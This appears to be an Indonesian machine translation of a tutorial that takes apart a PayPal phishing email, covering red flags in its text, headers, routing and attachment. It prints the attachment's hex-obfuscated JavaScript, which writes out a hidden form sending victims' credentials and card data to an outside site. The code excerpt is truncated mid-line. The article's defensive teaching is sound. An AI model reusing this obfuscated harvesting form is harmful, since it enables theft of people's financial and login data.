If-Koubou

Keamanan Online: Memecahkan Anatomi dari Email Phishing

Keamanan Online: Memecahkan Anatomi dari Email Phishing (Bagaimana caranya)


Di dunia saat ini di mana informasi semua orang sedang online, phishing adalah salah satu serangan online yang paling populer dan dahsyat, karena Anda selalu dapat membersihkan virus, tetapi jika rincian perbankan Anda dicuri, Anda berada dalam masalah. Berikut adalah rincian salah satu serangan yang kami terima.

Jangan berpikir bahwa itu hanya rincian perbankan Anda yang penting: setelah semua, jika seseorang mendapatkan kontrol atas login akun Anda, mereka tidak hanya tahu informasi yang terkandung dalam akun itu, tetapi kemungkinannya adalah bahwa informasi login yang sama dapat digunakan pada berbagai akun. Dan jika mereka berkompromi dengan akun email Anda, mereka dapat mengatur ulang semua kata sandi Anda yang lain.

Jadi, selain menyimpan kata sandi yang kuat dan beragam, Anda harus selalu waspada terhadap email palsu yang menyamar sebagai hal yang nyata. Meskipun sebagian besar upaya phishing bersifat amatir, beberapa di antaranya cukup meyakinkan sehingga penting untuk memahami cara mengenali mereka di tingkat permukaan serta cara kerjanya di bawah terpal.

Gambar oleh asirap

Memeriksa apa yang ada di Plain Sight

Contoh email kami, seperti kebanyakan upaya phishing, "memberi tahu" Anda tentang aktivitas di akun PayPal Anda yang, dalam keadaan normal, akan mengkhawatirkan. Jadi ajakan bertindak adalah memverifikasi / memulihkan akun Anda dengan mengirimkan hampir setiap bagian informasi pribadi yang dapat Anda pikirkan. Sekali lagi, ini cukup diformulasikan.

Meskipun tentu saja ada pengecualian, hampir semua email phishing dan scam dimuat dengan bendera merah langsung di pesan itu sendiri. Bahkan jika teksnya meyakinkan, Anda biasanya dapat menemukan banyak kesalahan berserakan di seluruh isi pesan yang menunjukkan pesan itu tidak sah.

Tubuh Pesan

Pada pandangan pertama, ini adalah salah satu email phishing yang lebih baik yang pernah saya lihat. Tidak ada kesalahan ejaan atau tata bahasa dan kata-kata bertuliskan sesuai dengan apa yang Anda harapkan. Namun, ada beberapa bendera merah yang dapat Anda lihat ketika Anda memeriksa konten sedikit lebih dekat.

  • "Paypal" - Kasus yang benar adalah "PayPal" (modal P). Anda dapat melihat kedua variasi digunakan dalam pesan. Perusahaan sangat disengaja dengan branding mereka, sehingga diragukan hal seperti ini akan melewati proses pemeriksaan.
  • "Izinkan ActiveX" - Berapa kali Anda melihat bisnis berbasis web legit ukuran Paypal menggunakan komponen kepemilikan yang hanya berfungsi pada satu browser, terutama ketika mereka mendukung beberapa browser? Tentu, di suatu tempat di luar sana ada perusahaan yang melakukannya, tetapi ini adalah bendera merah.
  • "Aman." - Perhatikan bagaimana kata ini tidak berbaris di margin dengan sisa teks paragraf. Bahkan jika saya meregangkan jendela sedikit lebih banyak, itu tidak membungkus atau ruang dengan benar.
  • "Paypal!" - Ruang sebelum tanda seru terlihat canggung. Hanya permainan kata lain yang saya yakin tidak akan ada di email yang sah.
  • "PayPal- Formulir Pembaruan Akun.pdf.htm" - Mengapa Paypal melampirkan "PDF" terutama ketika mereka hanya dapat menautkan ke halaman di situs mereka? Selain itu, mengapa mereka mencoba menyamarkan file HTML sebagai PDF? Ini bendera merah terbesar dari mereka semua.

Header Pesan

Saat Anda melihat header pesan, beberapa tanda merah lainnya muncul:

  • Alamat dari adalah [email protected].
  • Alamat yang hilang. Saya tidak mengosongkan ini, itu bukan bagian dari header pesan standar. Biasanya perusahaan yang memiliki nama Anda akan mempersonalisasi email kepada Anda.

Lampiran

Ketika saya membuka lampiran, Anda dapat langsung melihat tata letak tidak benar karena tidak ada informasi gaya. Sekali lagi, mengapa PayPal mengirim email ke formulir HTML padahal mereka hanya bisa memberi Anda tautan di situs mereka?

catatan: kami menggunakan penampil lampiran HTML bawaan Gmail untuk ini, tetapi sebaiknya Anda TIDAK MEMBUKA lampiran dari scammer. Tak pernah. Pernah. Mereka sangat sering mengandung eksploitasi yang akan menginstal trojan pada PC Anda untuk mencuri info akun Anda.

Gulir ke bawah sedikit lagi Anda dapat melihat bahwa formulir ini meminta tidak hanya untuk informasi login PayPal kami, tetapi untuk informasi perbankan dan kartu kredit juga. Beberapa gambar rusak.

Jelaslah bahwa upaya phishing ini terjadi setelah semuanya dengan satu langkah.

The Technical Breakdown

Meskipun harus cukup jelas berdasarkan apa yang terlihat jelas bahwa ini adalah upaya phishing, kita sekarang akan mendobrak susunan teknis email dan melihat apa yang dapat kita temukan.

Informasi dari Lampiran

Hal pertama yang harus dilihat adalah sumber HTML dari formulir lampiran yang mengirimkan data ke situs palsu.

Saat melihat sumber dengan cepat, semua tautan tampak valid karena mengarah ke “paypal.com” atau “paypalobjects.com” yang sah.

Sekarang kita akan melihat beberapa informasi dasar halaman yang dikumpulkan Firefox di halaman.

Seperti yang Anda lihat, beberapa grafik ditarik dari domain "blessedtobe.com", "goodhealthpharmacy.com" dan "pic-upload.de" bukan domain PayPal yang sah.

Informasi dari Header Email

Selanjutnya kita akan melihat header pesan email mentah. Gmail membuat ini tersedia melalui opsi menu Tampilkan Asli pada pesan.

Melihat informasi header untuk pesan asli, Anda dapat melihat pesan ini disusun menggunakan Outlook Express 6. Saya ragu PayPal memiliki seseorang di staf yang mengirim setiap pesan ini secara manual melalui klien email yang kedaluwarsa.

Sekarang melihat informasi routing, kita dapat melihat alamat IP dari pengirim dan server surat relay.

Alamat IP “Pengguna” adalah pengirim asli. Melakukan pencarian cepat pada informasi IP, kita dapat melihat IP pengiriman di Jerman.

Dan ketika kita melihat email server relay (mail.itak.at), alamat IP kita dapat melihat ini adalah ISP yang berbasis di Austria. Saya ragu PayPal mengarahkan email mereka secara langsung melalui ISP berbasis Austria ketika mereka memiliki sebuah peternakan server besar yang dengan mudah dapat menangani tugas ini.

Ke mana Data Pergi?

Jadi kami telah menentukan dengan jelas bahwa ini adalah email phishing dan mengumpulkan beberapa informasi tentang dari mana asal pesan itu, tetapi bagaimana dengan di mana data Anda dikirim?

Untuk melihat ini, kita harus terlebih dahulu menyimpan lampiran HTM lakukan desktop kita dan buka di editor teks. Menggulirkannya, semuanya tampak berurutan kecuali ketika kita melihat blok Javascript yang mencurigakan.

Memecahkan sumber lengkap dari blok terakhir Javascript, kita melihat:


// Hak cipta © 2005 Voormedia - WWW.VOORMEDIA.COM
var i, y, x =”3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e”; y =”; for (i = 0; i<>

Setiap kali Anda melihat string besar campur aduk huruf dan angka acak yang tertanam dalam blok Javascript, biasanya itu sesuatu yang mencurigakan. Melihat kode, variabel "x" diatur ke string besar ini dan kemudian diterjemahkan ke dalam variabel "y". Hasil akhir dari variabel "y" kemudian ditulis ke dokumen sebagai HTML.

Karena string besar dibuat dari angka 0-9 dan huruf a-f, kemungkinan besar dikodekan melalui ASCII sederhana ke konversi Hex:

3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e

Diterjemahkan menjadi:

Bukan suatu kebetulan bahwa ini menerjemahkan ke dalam bentuk tag HTML yang valid yang mengirim hasilnya tidak ke PayPal, tetapi ke situs jahat.

Selain itu, ketika Anda melihat sumber HTML formulir, Anda akan melihat bahwa tag formulir ini tidak terlihat karena dihasilkan secara dinamis melalui Javascript. Ini adalah cara cerdas untuk menyembunyikan apa yang sebenarnya dilakukan HTML jika seseorang hanya melihat sumber yang dihasilkan dari lampiran (seperti yang kita lakukan sebelumnya) sebagai lawan pembukaan lampiran langsung di editor teks.

Menjalankan whois cepat di situs yang menyinggung, kita dapat melihat ini adalah domain yang dihosting di host web populer, 1and1.

Yang menonjol adalah domain menggunakan nama yang dapat dibaca (sebagai lawan dari sesuatu seperti "dfh3sjhskjhw.net") dan domain telah terdaftar selama 4 tahun. Karena itu, saya yakin domain ini dibajak dan digunakan sebagai pion dalam upaya phishing ini.

Sinisme adalah Pertahanan yang Baik

Ketika datang untuk tetap aman online, tidak ada salahnya untuk memiliki sedikit sinisme yang baik.

Sementara saya yakin ada lebih banyak tanda merah di email contoh, yang kami tunjukkan di atas adalah indikator yang kami lihat setelah hanya beberapa menit ujian. Secara hipotetis, jika tingkat permukaan email menirukan mitra sahnya 100%, analisis teknis akan tetap mengungkapkan sifat sejatinya. Inilah sebabnya mengapa mengimpor untuk dapat memeriksa apa yang Anda bisa dan tidak bisa lihat.